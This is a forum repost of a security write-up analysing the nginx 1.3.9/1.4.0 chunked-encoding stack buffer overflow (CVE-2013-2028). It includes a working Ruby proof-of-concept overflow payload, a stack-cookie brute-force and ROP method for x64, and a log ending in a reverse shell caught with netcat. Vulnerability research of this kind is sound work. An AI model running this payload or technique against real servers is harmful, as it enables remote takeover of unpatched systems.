Jump to content
Nytro

Analysis of nginx 1.3.9/1.4.0 stack buffer overflow and x64 exploitation (CVE-2013-20

Recommended Posts

[h=1]Analysis of nginx 1.3.9/1.4.0 stack buffer overflow and x64 exploitation (CVE-2013-2028)[/h]May 21, 2013 by w00d

A few days after the release of nginx advisory (CVE-2013-2028), we managed to successfully exploit the vulnerability with a full control over the program flow. However, in order to make it more reliable and useful in real world environment, we still explored several program paths and found some other attack vectors. Since the exploit for Nginx 32-bit is available on Metasploit now, we decide to publish some of our works here. In this post, you will find a quick analysis for the vulnerability and an exploitation for a 64-bit linux server using the stack based overflow attack vector.

[h=3]The Bug[/h] Based on the patch on nginx.org, there is a code path that leads to a stack based overflow vulnerability, related to 03 different nginx components

1) The calculation of “chunked size” when someone send a http request with the header: “Transfer-Encoding: chunked”. It is calculated at src/http/ngx_http_parse.c:2011

if (ch >= '0' && ch <= '9') {   ctx->size = ctx->size * 16 + (ch - '0');
break;
}
c = (u_char) (ch | 0x20);
if (c >= 'a' && c <= 'f') { ctx->size = ctx->size * 16 + (c - 'a' + 10);
break;
}

It simply parses the chunked size input as hex and convert it to base of 10. And since ctx->size is defined with size_t, an unsigned type, the value of the variable can be misinterpreted as negative number when casting to signed type, as we will see later.

2) Nginx module when serving static file:

When nginx is setup to serve static file (which is the default setting), ngx_http_static_handler in src/http/modules/ngx_http_static_module.c:49 will be executed when receiving a request.

ngx_http_static_handler will then call ngx_http_discard_request_body at src/http/modules/ngx_http_static_module.c:211.

ngx_http_discard_request_body will then call ngx_http_read_discarded_request_body at src/http/ngx_http_request_body.c:526.

In summary the code path: ngx_http_static_handler->ngx_http_static_handler->ngx_http_discard_request_body->ngx_http_read_discarded_request_body

ngx_http_read_discarded_request_body is where it gets interesting, we can see a buffer with fixed size is defined at src/http/ngx_http_request_body.c:630 as follows:

static ngx_int_t
ngx_http_read_discarded_request_body(ngx_http_request_t *r)
{
size_t size;
ssize_t n;
ngx_int_t rc;
ngx_buf_t b;
u_char buffer[NGX_HTTP_DISCARD_BUFFER_SIZE];

NGX_HTTP_DISCARD_BUFFER_SIZE is defined as 4096 in src/http/ngx_http_request.h:19

The interesting is at how this buffer is filled at src/http/ngx_http_request_body.c:649 that we shall use later in (3)

size = (size_t) ngx_min(r->headers_in.content_length_n, NGX_HTTP_DISCARD_BUFFER_SIZE);
n = r->connection->recv(r->connection, buffer, size);

3) The state transition when parsing http request

Come back to src/http/ngx_http_request_body.c, before calling ngx_http_read_discarded_request_body, nginx check whether we have a “chunked” type of request, it will then run ngx_http_discard_request_body_filter defined in src/http/ngx_http_request_body.c:680.

ngx_http_discard_request_body_filter will execute ngx_http_parse_chunked which is the code we mentioned in (1). After that, the return value “rc” is checked with some constant to decide the next move. One of them is particularly very interesting.

if (rc == NGX_AGAIN) {
/* set amount of data we want to see next time */
r->headers_in.content_length_n = rb->chunked->length;
break;
}

Suppose we can set rb->chunked->length as a very large number at (1), and then set rc = NGX_AGAIN at (3,) following events will happen:

- r->headers_in.content_length_n is set to negative ( as it is defined with `off_t` which is “a signed integer” type.).

- The function ngx_http_discard_request_body_filter return and the program move to execute ngx_http_read_discarded_request_body. which contains our vulnerable buffer.

- Finally the recv() command is tricked to receive more than 4096 bytes and overflow the buffer on the stack.

There are many ways to set chunked->length, since rb->chunked->length is assigned at the end of ngx_http_parse_chunked function based on the rb->chunked->size that we have a direct control.

switch (state) {
case sw_chunk_start:
ctx->length = 3 /* "0" LF LF */;
break;
case sw_chunk_size:
ctx->length = 2 /* LF LF */
+ (ctx->size ? ctx->size + 4 /* LF "0" LF LF */ : 0);

To make rc = NGX_AGAIN, we realize that for a request nginx makes the first recv with 1024 bytes, so if we send more than 1024 bytes ngx_http_parse_chunked will return with a NGX_AGAIN then when nginx tries to recv again it will be right into our setup.

The payload to overflow the stack buffer is as followed:

- Send http request with a “transfer-encoding: chunked”

- Send a large hexadecimal number to fill the entire 1024 bytes of the first read

- Send > 4096 bytes to overflow the buffer when it try to recv the second times

TL;DR ? Here is the proof of concept for x64

require 'ronin'
tcp_connect(ARGV[0],ARGV[1].to_i) { |s|
payload = ["GET / HTTP/1.1\r\n",
"Host: 1337.vnsecurity.net\r\n",
"Accept: */*\r\n",
"Transfer-Encoding: chunked\r\n\r\n"].join
payload << "f"*(1024-payload.length-8) + "0f0f0f0f" #chunked
payload << "A"*(4096+8) #padding
payload << "C"*8 #cookie
s.send(payload, 0)
}

strace output at the other end:

 strace -p 11337 -s 5000 2>&1 | grep recv
recvfrom(3, "GET / HTTP/1.1\r\nHost: 1337.vnsecurity.net\r\nAccept: */*\r\nTransfer-Encoding: chunked\r\n\r\nfff...snip..fff0f0f0f0f", 1024, 0, NULL, NULL) = 1024
recvfrom(3, "AAA..snip..AACCCCCCCC", 18446744069667229461, 0, NULL, NULL) = 4112

[h=3]Exploitation on x64:[/h] The problem of stack cookie/carnary can be overcome easily by brute-forcing byte by byte. If we send an extra byte and a worker process crashes, it will return nothing thus we know our cookie value is wrong, we try another value until we receive some output.

Then we need to bypass ASLR and DEP. The exploitation for 32-bit in the metasploit module won’t work, since it will bruteforce the libc address and it’s not feasible given the large address space in x64.

We give an exploit that only relies on the binary i.e. we build the ROP gadget from the binary. mprotect address is computed from mmap64 address (in the GOT-table) then use to allocate a writable-executable memory chunked. Then we use some ROP gadgets to copy our shellcode and have it executed by return to it finally.

TL;DR full exploit code could be find here

ruby exp-nginx.rb 1.2.3.4 4321
[+] searching for byte: 1
214
[+] searching for byte: 2
102
[+] searching for byte: 3
232
[+] searching for byte: 4
213
[+] searching for byte: 5
103
[+] searching for byte: 6
151
[+] searching for byte: 7
45
Found cookie: \x00\xd6\x66\xe8\xd5\x67\x97\x2d 8
PRESS ENTER TO GIVE THE SHIT TO THE HOLE AT w.w.w.w 4000
1120 connections

At w.w.w.w

nc -lvvv 4000
Connection from 1.2.3.4 port 4000 [tcp/*] accepted
uname -a
Linux ip-10-80-253-191 3.2.0-40-virtual #64-Ubuntu SMP Mon Mar 25 21:42:18 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),110(netdev),111(admin)
ps aux | grep nginx
ubuntu 2920 0.1 0.0 13920 668 ? Ss 15:11 0:01 nginx: master process ./sbin/nginx
ubuntu 5037 0.0 0.0 14316 1024 ? S 15:20 0:00 nginx: worker process
ubuntu 5039 0.0 0.0 14316 1024 ? S 15:20 0:00 nginx: worker process
ubuntu 5041 0.0 0.0 14316 1024 ? S 15:20 0:00 nginx: worker process

[h=3]Reliable exploitation[/h] There are some reasons that the above exploitation/technique may not work in practice:

1) Nginx uses non-blocking recv(). If we can’t send enough data to overwrite the return address/cookie the exploit will failed. This is mostly the case since the normal server will be loaded with requests from different user.

2) Our analysis here is for the default setting of nginx, the code path can be very different with another setting thus making the exploit somewhat useless.

3) A blind attack is difficult without the knowledge of the binary / OS at the remote server. For 32-bit OS, one may further bruteforce the “write” address in the code space in order to leak information but It will still fail for PIE.

Trying to make this more practical in real world environments, we actually found another attack vector which is more reliable and worked on several nginx settings. However, we will keep it for another post.

Sursa: Analysis of nginx 1.3.9/1.4.0 stack buffer overflow and x64 exploitation (CVE-2013-2028) : VNSECURITY / CLGT TEAM

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...